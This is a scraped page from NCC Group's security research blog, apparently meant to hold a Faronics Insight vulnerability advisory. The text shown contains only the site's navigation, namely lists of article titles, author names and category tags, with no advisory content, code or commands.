URL: https://research.nccgroup.com/2023/05/30/technical-advisory-multiple-vulnerabilities-in-faronics-insight/

 * Eurocrypt 2023: Death of a KEM
 * Reverse Engineering Coin Hunt World’s Binary Protocol
 * Technical Advisory – Multiple Vulnerabilities in Faronics Insight
   (CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347,
   CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351,
   CVE-2023-28352, CVE-2023-28353)
 * Tool Release: Code Query (cq)
 * CowCloud
 * OffensiveCon 2023 – Exploit Engineering – Attacking the Linux Kernel
 * Tool Release: Code Credential Scanner (ccs)
 * Exploring Overfitting Risks in Large Language Models
 * The Paillier Cryptosystem with Applications to Threshold ECDSA
 * Rigging the Vote: Uniqueness in Verifiable Random Functions
 * Medical Devices: A Hardware Security Perspective
 * NETGEAR Routers: A Playground for Hackers?
 * Real World Cryptography Conference 2023 – Part I
 * Public Report – AWS Nitro System API & Security Claims
 * State of DNS Rebinding in 2023
 * Machine Learning 103: Exploring LLM Code Generation
 * HITBAMS – Your Not so “Home” Office – Soho Hacking at Pwn2Own
 * Public Report – Kubernetes 1.24 Security Audit
 * Public Report – Solana Program Library ZK-Token Security Assessment
 * Stepping Insyde System Management Mode
 * Breaking Pedersen Hashes in Practice
 * A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
 * Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run
   Payloads
 * A Primer On Slowable Encoders
 * Threat Spotlight – Hydra
 * Rustproofing Linux (Part 4/4 Shared Memory)
 * Rustproofing Linux (Part 3/4 Integer Overflows)
 * Security Code Review With ChatGPT
 * Rustproofing Linux (Part 2/4 Race Conditions)
 * Readable Thrift
 * Building WiMap the Wi-Fi Mapping Drone
 * Fuzzing the Easy Way Using Zulu
 * Exploiting CVE-2014-0282
 * Rustproofing Linux (Part 1/4 Leaking Addresses)
 * Machine Learning 102: Attacking Facial Authentication with Poisoned Data
 * Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
 * Using Semgrep with Jupyter Notebook files
 * Announcing NCC Group’s Cryptopals Guided Tour: Set 2
 * Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB
   DFU (CVE-2022-2347)
 * Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store
   (CVE-2023-21433, CVE-2023-21434)
 * Project Bishop: Clustering Web Pages
 * Puckungfu: A NETGEAR WAN Command Injection
 * MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
 * Machine Learning 101: The Integrity of Image (Mis)Classification?
 * Replicating CVEs with KLEE
 * Public Report – VPN by Google One Security Assessment
 * Public Report – Confidential Space Security Review
 * Exploring Prompt Injection Attacks
 * Impersonating Gamers With GPT-2
 * So long and thanks for all the 0day
 * A jq255 Elliptic Curve Specification, and a Retrospective
 * Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
 * Tool Release – Web3 Decoder Burp Suite Extension
 * Tales of Windows detection opportunities for an implant framework
 * Check out our new Microcorruption challenges!
 * Toner Deaf – Printing your next persistence (Hexacon 2022)
 * Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and
   Related Classes
 * Public Report – IOV Labs powHSM Security Assessment
 * Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and
   CSF Tampering on NXP i.MX Devices
 * A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a
   ShadowPad intrusion
 * Detecting Mimikatz with Busylight
 * Whitepaper – Project Triforce: Run AFL On Everything (2017)
 * Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
 * Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router
   (CVE-2022-37413, CVE-2022-37414)
 * A Guide to Improving Security Through Infrastructure-as-Code
 * Tool Release – ScoutSuite 5.12.0
 * Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter
   Selection Review
 * Tool Release – Monkey365
 * Sharkbot is back in Google Play
 * Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
 * There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
 * Conference Talks – September/October 2022
 * SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
 * Writing FreeBSD Kernel Modules in Rust
 * NCC Con Europe 2022 – Pwn2Own Austin Presentations
 * Tool Release – JWT-Reauth
 * Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
 * Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
 * Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
 * Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
 * Top of the Pops: Three common ransomware entry techniques
 * NCC Group Research at Black Hat USA 2022 and DEF CON 30
 * Tool Release – insject: A Linux Namespace Injector
 * Technical Advisory – Multiple vulnerabilities in Nuki smart locks
   (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507,
   CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508,
   CVE-2022-32505)
 * NIST Selects Post-Quantum Algorithms for Standardization
 * Climbing Mount Everest: Black-Byte Bytes Back?
 * Five Essential Machine Learning Security Papers
 * Whitepaper – Practical Attacks on Machine Learning Systems
 * Flubot: the evolution of a notorious Android Banking Malware
 * A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would
   have prevented
 * Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control
   link
 * Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities
   in U-Boot (CVE-2022-30790, CVE-2022-30552)
 * Understanding the Impact of Ransomware on Patient Outcomes – Do We Know
   Enough?
 * Public Report – Threshold ECDSA Cryptography Review
 * Exception Handling and Data Integrity in Salesforce
 * Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi
   Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328,
   CVE-2022-30329)
 * Shining the Light on Black Basta
 * Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790,
   CVE-2022-30552)
 * NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible
   Reports through the Intel Circuit Breaker program
 * Conference Talks – June 2022
 * Hardware Security By Design: ESP32 Guidance
 * Public Report – Lantern and Replica Security Assessment
 * NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher
   Leaderboard
 * Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 –
   Unauthenticated Command Injection (CVE-2022-31794 and CVE-2022-31795)
 * Public Report – go-cose Security Assessment
 * Technical Advisory – SerComm h500s – Authenticated Remote Command Execution
   (CVE-2021-44080)
 * Metastealer – filling the Racoon void
 * earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s
   decompiler internals to make automatic P-Code analysis scripts
 * Tool Release – Ghostrings
 * Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo
   Smart Locks Vulnerable to Relay Attacks
 * Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to
   Relay Attacks
 * Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
 * Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView
   tag helpers (CVE-2022-27777)
 * North Korea’s Lazarus: their initial access trade-craft using social media
   and social engineering
 * Adventures in the land of BumbleBee – a new malicious loader
 * LAPSUS$: Recent techniques, tactics and procedures
 * Real World Cryptography Conference 2022
 * Mitigating the top 10 security threats to GCP using the CIS Google Cloud
   Platform Foundation Benchmark
 * A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
 * Public Report – Google Enterprise API Security Assessment
 * Conti-nuation: methods and techniques observed in operations post the leaks
 * Whitepaper – Double Fetch Vulnerabilities in C and C++
 * Mining data from Cobalt Strike beacons
 * Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
 * Tool Release – ScoutSuite 5.11.0
 * Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
 * Microsoft announces the WMIC command is being retired, Long Live PowerShell
 * SharkBot: a “new” generation Android banking Trojan being distributed on
   Google Play Store
 * Estimating the Bit Security of Pairing-Friendly Curves
 * Detecting anomalous Vectored Exception Handlers on Windows
 * BrokenPrint: A Netgear stack overflow
 * Hardware & Embedded Systems: A little early effort in security can return a
   huge payoff
 * Public Report – O(1) Labs Mina Client SDK, Signature Library and Base
   Components Cryptography and Implementation Review
 * Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark
   MC3224i printer (part 2)
 * Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5
   Attacks vs the CIS Microsoft 365 Foundation Benchmark
 * Bypassing software update package encryption – extracting the Lexmark MC3224i
   printer firmware (part 1)
 * Detecting Karakurt – an extortion focused threat actor
 * BAT: a Fast and Small Key Encapsulation Mechanism
 * Testing Infrastructure-as-Code Using Dynamic Tooling
 * Machine Learning for Static Analysis of Malware – Expansion of Research Scope
 * 10 real-world stories of how we’ve compromised CI/CD pipelines
 * NCC Group’s 2021 Annual Research Report
 * On the malicious use of large language models like GPT-3
 * Exploring the Security & Privacy of Canada’s Digital Proof of Vaccination
   Programs
 * Tool Update – ruby-trace: A Low-Level Tracer for Ruby
 * Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches
 * Technical Advisory – Lenovo ImController Local Privilege Escalation
   (CVE-2021-3922, CVE-2021-3969)
 * Choosing the Right MCU for Your Embedded Device — Desired Security Features
   of Microcontrollers
 * FPGAs: Security Through Obscurity?
 * Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
 * log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
 * Log4Shell: Reconnaissance and post exploitation network detection
 * Announcing NCC Group’s Cryptopals Guided Tour!
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary
   File Deletion
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
 * Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated
   Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
 * Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote
   Command Execution (CVE-2021-20044)
 * Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow
   (CVE-2021-20043)
 * Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload
   Path Traversal (CVE-2021-20040)
 * Why IoT Security Matters
 * Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom
   CA Network Flow Analysis (CVE-2021-44050)
 * Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates
   with the Half-Space-Trees Algorithm
 * Tracking a P2P network related to TA505
 * Conference Talks – December 2021
 * Public Report – Zendoo Proof Verifier Cryptography Review
 * An Illustrated Guide to Elliptic Curve Cryptography Validation
 * Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
 * POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
 * Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router
   (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
 * “We wait, because we know you.” Inside the ransomware negotiation economics.
 * Detection Engineering for Kubernetes clusters
 * Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
 * Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA
   Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568,
   CVE-2021-43571)
 * TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial
   access
 * Public Report – Zcash NU5 Cryptography Review
 * The Next C Language Standard (C23)
 * Conference Talks – November 2021
 * Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
 * Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
 * Cracking RDP NLA Supplied Credentials for Threat Intelligence
 * Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the
   Internet
 * Enterprise-scale seamless onboarding and deployment of Azure Sentinel using
   Lighthouse for multi-tenant environments
 * Cracking Random Number Generators using Machine Learning – Part 2: Mersenne
   Twister
 * Cracking Random Number Generators using Machine Learning – Part 1:
   xorshift128
 * NCC Group placed first in global 5G Cyber Security Hack competition
 * Paradoxical Compression with Verifiable Delay Functions
 * A Look At Some Real-World Obfuscation Techniques
 * SnapMC skips ransomware, steals data
 * The Challenges of Fuzzing 5G Protocols
 * Reverse engineering and decrypting CyberArk vault credential files
 * Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session
   Establishment on UPF (CVE-2021-41794)
 * Assessing the security and privacy of Vaccine Passports
 * Technical Advisory – NULL Pointer Dereference in McAfee Drive
   Encryption (CVE-2021-23893)
 * Conference Talks – October 2021
 * Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
 * Detecting and Hunting for the PetitPotam NTLM Relay Attack
 * Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI
   (CVE-2021-39307)
 * Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
 * CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
 * NSA & CISA Kubernetes Security Guidance – A Critical Review
 * Technical Advisory – New York State Excelsior Pass Vaccine Passport
   Credential Forgery
 * Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner
   App Sends Data to a Third Party not Specified in Privacy Policy
 * Conference Talks – September 2021
 * The ABCs of NFC chip security
 * CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
 * Disabling Office Macros to Reduce Malware Infections
 * Some Musings on Common (eBPF) Linux Tracing Bugs
 * Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive
   Extraction – CVE-2021-22937 (Patch Bypass)
 * Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection
   (CVE-2021-36380)
 * Practical Considerations of Right-to-Repair Legislation
 * Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
 * Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log
   Server (CVE-2021-35478, CVE-2021-35479)
 * Detecting and Hunting for the Malicious NetFilter Driver
 * CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
 * NCC Group Research at Black Hat USA 2021 and DEF CON 29
 * Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
 * Software-Based Fault Injection Countermeasures (Part 2/3)
 * An Introduction to Fault Injection (Part 1/3)
 * Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite
   (CVE-2021-21586, CVE-2021-21587)
 * Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare
   vCenter Server 7.0
 * Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
 * Tool Release – Reliably-checked String Library Binding
 * Are you oversharing (in Salesforce)? Our new tool could sniff it out!
 * Exploit mitigations: keeping up with evolving and complex software/hardware
 * NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use
   Against Security Researchers
 * Handy guide to a new Fivehands ransomware variant
 * On the Use of Pedersen Commitments for Confidential Payments
 * Incremental Machine Learning by Example: Detecting Suspicious Activity with
   Zeek Data Streams, River, and JA3 Hashes
 * Testing Two-Factor Authentication
 * Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
 * Research Paper – Machine Learning for Static Malware Analysis, with
   University College London
 * Conference Talks – June 2021
 * Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and
   Implementation Review
 * iOS User Enrollment and Trusted Certificates
 * Detecting Rclone – An Effective Tool for Exfiltration
 * Supply Chain Security Begins with Secure Software Development
 * Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re
   cryptographically random)
 * Public Report – Dell Secured Component Verification
 * RM3 – Curiosities of the wildest banking malware
 * Conference Talks – May 2021
 * A Census of Deployed Pulse Connect Secure (PCS) Versions
 * NCC Group’s Upcoming Trainings at Black Hat USA 2021
 * Public Report – VPN by Google One: Technical Security & Privacy Assessment
 * Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s
   servers on startup
 * Tool Release – Principal Mapper v1.1.0 Update
 * SAML XML Injection
 * The Future of C Code Review
 * RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API
   vulnerabilities CVE-2021-22986
 * Tool Release – Solitude: A privacy analysis tool
 * Deception Engineering: exploring the use of Windows Installer Packages
   against first stage payloads
 * Lending a hand to the community – Covenant v0.7 Updates
 * Technical Advisory: Dell SupportAssist Local Privilege Escalation
   (CVE-2021-21518)
 * Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus
   JGS516PE / GS116Ev2 Switches
 * Deception Engineering: exploring the use of Windows Service Canaries against
   ransomware
 * Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
 * Technical Advisory: Administrative Passcode Recovery and Authenticated Remote
   Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309,
   CVE-2021-25306)
 * Cryptopals: Exploiting CBC Padding Oracles
 * Investigating Potential Security Vulnerability Manifestation through Various
   Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be
   Improved)
 * NCC Group’s 2020 Annual Research Report
 * Conference Talks – February/March 2021
 * Software Verification and Analysis Using Z3
 * Technical Advisory – Linksys WRT160NL – Authenticated Command Injection
   (CVE-2021-25310)
 * Real World Cryptography Conference 2021: A Virtual Experience
 * RIFT: Analysing a Lazarus Shellcode Execution Method
 * MSSQL Lateral Movement
 * Public Report – BLST Cryptographic Implementation Review
 * Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
 * Abusing cloud services to fly under the radar
 * Building an RDP Credential Catcher for Threat Intelligence
 * Double-odd Elliptic Curves
 * Using AWS and Azure for Cost Effective Log Ingestion with Data Processing
   Pipelines for SIEMs
 * Domestic IoT Nightmares: Smart Doorbells
 * Technical Advisory: OS Command Injection in Silver Peak EdgeConnect
   Appliances (CVE-2020-12148, CVE-2020-12149)
 * Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot
   Configuration Auditing Introduced in Depthcharge v0.2.0
 * An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered
   Harmful
 * ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
 * Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP
   Signatures
 * ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial
   and Business Networks
 * Tool Release – Carnivore: Microsoft External Assessment Tool
 * Technical Advisory: containerd – containerd-shim API Exposed to Host Network
   Containers (CVE-2020-15257)
 * Conference Talks – December 2020
 * TA505: A Brief History Of Their Time
 * Decrypting OpenSSH sessions for fun and profit
 * Past, Present and Future of Effective C
 * Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS)
   Vulnerabilities in Oracle Communications Diameter Signaling Router
   (CVE-2020-14787, CVE-2020-14788)
 * Technical Advisory: Command Injection
 * Conference Talks – November 2020
 * Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon
   Message (CVE-2020-8255)
 * Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip
   Extraction (CVE-2020-8260)
 * Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code
   Execution (CVE-2020-27162)
 * Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation
   Bypass (CVE-2020-27161)
 * Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
 * Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow
   (CVE-2020-26561)
 * There’s A Hole In Your SoC: Glitching The MediaTek BootROM
 * RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and
   CVE-2020-8196 honeypot data release
 * Technical Advisory – Pulse Connect Secure – RCE via Template Injection
   (CVE-2020-8243)
 * Tool – Windows Executable Memory Page Delta Reporter
 * Salesforce Security with Remote Working
 * Tool Release – ScoutSuite 5.10
 * Conference Talks – October 2020
 * Tool Release – ICPin, an integrity-check and anti-debug detection pintool
 * Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
 * Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP
   Method Interchange (CVE-2020-13658)
 * Online Casino Roulette – A guideline for penetration testers and security
   researchers
 * Extending a Thinkst Canary to become an interactive honeypot
 * StreamDivert: Relaying (specific) network connections
 * Public Report – Electric Coin Company NU4 Cryptographic Specification and
   Implementation Review
 * Machine learning from idea to reality: a PowerShell case study
 * Conference Talks – September 2020
 * Whitepaper – Exploring the Security of KaiOS Mobile Applications
 * Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack
   (CVE-2020-24613)
 * Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS
   Pre-installed Mobile Applications
 * Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP
   application
 * Immortalising 20 Years of Epic Research
 * Pairing over BLS12-381, Part 3: Pairing!
 * Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
 * NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers
   in 2020
 * Lights, Camera, HACKED! An insight into the world of popular IP Cameras
 * Conference Talks – August 2020
 * Tool Release – Winstrument: An Instrumentation Framework for Windows
   Application Assessments
 * Tool Release: Sinking U-Boots with Depthcharge
 * Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to
   device compromise on TP-Link C200 IP Camera
 * Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
 * Pairing over BLS12-381, Part 2: Curves
 * Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability
   CVE-2020-5902
 * RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and
   CVE-2020-8196 Intelligence
 * An offensive guide to the Authorization Code grant
 * Technical Advisory – KwikTag Web Admin Authentication Bypass
 * Pairing over BLS12-381, Part 1: Fields
 * RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
   Intelligence
 * Experiments in Extending Thinkst Canary – Part 1
 * Tool Release – ScoutSuite 5.9.0
 * Technical Advisory – macOS Installer Local Root Privilege Escalation
   (CVE-2020-9817)
 * Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to
   make threat actors work harder and fail more often
 * How-to: Importing WStalker CSV (and more) into Burp Suite via Import to
   Sitemap Extension
 * Tool: WStalker – an easy proxy to support Web API assessments
 * Security Considerations of zk-SNARK Parameter Multi-Party Computation
 * WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
 * Tool Release – Socks Over RDP Now Works With Citrix
 * Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
 * Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
 * Cyber Security of New Space Paper
 * In-depth analysis of the new Team9 malware family
 * Common Insecure Practices with Configuring and Extending Salesforce
 * Exploring DeepFake Capabilities & Mitigation Strategies with University
   College London
 * Game Security
 * Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
 * Research Report – Zephyr and MCUboot Security Assessment
 * CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a
   better read/write primitive
 * CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read
   and write primitive
 * Using SharePoint as a Phishing Platform
 * Public Report – Coda Cryptographic Review
 * Shell Arithmetic Expansion and Evaluation Abuse
 * CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition
   and debugging tricks
 * Tool Release – Socks Over RDP
 * Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
 * CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic
   triggering
 * Practical Machine Learning for Random (Filename) Detection
 * Curve9767 and Fast Signature Verification
 * CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
 * The Extended AWS Security Ramp-Up Guide
 * Code Patterns for API Authorization: Designing for Security
 * Order Details Screens and PII
 * How cryptography is used to monitor the spread of COVID-19
 * Rise of the Sensors: Securing LoRaWAN Networks
 * C Language Standards Update – Zero-size Reallocations are Undefined Behavior
 * IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
 * Exploring Verifiable Random Functions in Code
 * Crave the Data: Statistics from 1,300 Phishing Campaigns
 * Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
 * Tool Release – ScoutSuite 5.8.0
 * Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level
   Vulnerabilities
 * Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
 * LDAPFragger: Bypassing network restrictions using LDAP attributes
 * Threat Actors: exploiting the pandemic
 * A Survey of Istio’s Network Security Features
 * Conference Talks – March 2020
 * Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation
   Review
 * Reviewing Verifiable Random Functions
 * CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for
   fun and exploitation
 * Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
 * Improving Software Security through C Language Standards
 * Whitepaper – A Tour of Curve 25519 in Erlang
 * Deep Dive into Real-World Kubernetes Threats
 * Technical Advisory – playSMS Pre-Authentication Remote Code Execution
   (CVE-2020-8644)
 * Interfaces.d to RCE
 * Properly Signed Certificates on CPE Devices
 * Conference Talks – February 2020
 * Tool Release – Collaborator++
 * Public Report – Electric Coin Company NU3 Specification and Blossom
   Implementation Audit
 * Tool Release – Enumerating Docker Registries with go-pillage-registries
 * Conference Talks – January 2020
 * Passive Decryption of Ethereum Peer-to-Peer Traffic
 * On Linux’s Random Number Generation
 * Demystifying AWS’ AssumeRole and sts:ExternalId
 * Welcome to the new NCC Group Global Research blog
 * Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet;
   and Unprotected client and server data transmission between Android and IOS
   clients
 * Security impact of IoT on the Enterprise
 * Secure Device Provisioning Best Practices: Heavy Truck Edition
 * CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device
   Host Service and the Update Orchestrator Service
 * pixelkicks-fiona
 * pixelkicks-fred
 * pixelkicks-matt.hamer
 * pixelkicks-turhan
 * pixelkicks-will
 * pqueenncc
 * Philipp Schaefer
 * qkchambers
 * Rory McCune
 * Rami McCarthy
 * Ray Lai
 * Robert C. Seacord
 * Rennie deGraaf
 * Chris Nevin
 * Richard Appleby
 * Rick Veldhoven
 * Fumik0_
 * Rindert Kramer
 * Rob Ince
 * robertgrimes123
 * Robert Wessen
 * Ross Bradley
 * Robert Schwass
 * sampeate
 * Roger Meyer
 * schlopeckincc
 * Siddarth Adukia
 * Sam Leonard (they/them)
 * Spencer Michaels
 * sean.morland@nccgroup.com
 * Sander de Jong
 * Stuart Kurutac
 * Subscriber Test
 * Sultan Khan
 * Swathi Nagarajan
 * Simon Watson
 * Jeff Dileo
 * Thomas Marshall
 * Ivan Reedman
 * Thomas Pornin
 * Jeremy Boone
 * Viktor Gazdag
 * Vishtasp Jokhi
 * Wouter Jansen
 * William Groesbeck
 * whoughtonncc
 * Wordpress SSO Test
 * Xavier Garceau-Aranda
 * Ken Gannon
 * Kevin Henry
 * 5G Security & Smart Environments
 * Academic Partnership
 * Annual Research Report
 * Asia Pacific Research
 * Awards & Recognition
 * Books
 * Business Insights
 * CIRT
 * Cloud & Containerization
 * Cloud Security
 * Conferences
 * Corporate
 * Cryptography
 * CTFs/Microcorruption
 * Current events
 * Cyber as a Science
 * Cyber Security
 * Detection and Threat Hunting
 * Disclosure Policy
 * Emerging Technologies
 * Engineering
 * Fox-IT
 * Fox-IT and European Research
 * Gaming & Media
 * Hardware & Embedded Systems
 * Intern Projects
 * iSec Partners
 * Machine Learning
 * Managed Detection & Response
 * Misinformation, Deepfakes, & Synthetic Media
 * North American Research
 * Offensive Security & Artificial Intelligence
 * Patch notifications
 * Presentations
 * protocol_name
 * Public interest technology
 * Public interest technology
 * Public Reports
 * Public tools
 * Reducing Vulnerabilities at Scale
 * Research
 * Research Paper
 * Reverse Engineering
 * Risk Management & Governance
 * Standards
 * Technical advisories
 * Technology Policy
 * Threat briefs
 * Threat Intelligence
 * Tool Release
 * Transport
 * Tutorial/Study Guide
 * UK Research
 * Uncategorized
 * Virtualization, Emulation, & Containerization
 * VSR
 * Vulnerability
 * Whitepapers

Enter a search term

Search
 * Eurocrypt 2023: Death of a KEM
 * Reverse Engineering Coin Hunt World’s Binary Protocol
 * Technical Advisory – Multiple Vulnerabilities in Faronics Insight
   (CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347,
   CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351,
   CVE-2023-28352, CVE-2023-28353)
 * Tool Release: Code Query (cq)
 * CowCloud
 * OffensiveCon 2023 – Exploit Engineering – Attacking the Linux Kernel
 * Tool Release: Code Credential Scanner (ccs)
 * Exploring Overfitting Risks in Large Language Models
 * The Paillier Cryptosystem with Applications to Threshold ECDSA
 * Rigging the Vote: Uniqueness in Verifiable Random Functions
 * Medical Devices: A Hardware Security Perspective
 * NETGEAR Routers: A Playground for Hackers?
 * Real World Cryptography Conference 2023 – Part I
 * Public Report – AWS Nitro System API & Security Claims
 * State of DNS Rebinding in 2023
 * Machine Learning 103: Exploring LLM Code Generation
 * HITBAMS – Your Not so “Home” Office – Soho Hacking at Pwn2Own
 * Public Report – Kubernetes 1.24 Security Audit
 * Public Report – Solana Program Library ZK-Token Security Assessment
 * Stepping Insyde System Management Mode
 * Breaking Pedersen Hashes in Practice
 * A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
 * Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run
   Payloads
 * A Primer On Slowable Encoders
 * Threat Spotlight – Hydra
 * Rustproofing Linux (Part 4/4 Shared Memory)
 * Rustproofing Linux (Part 3/4 Integer Overflows)
 * Security Code Review With ChatGPT
 * Rustproofing Linux (Part 2/4 Race Conditions)
 * Readable Thrift
 * Building WiMap the Wi-Fi Mapping Drone
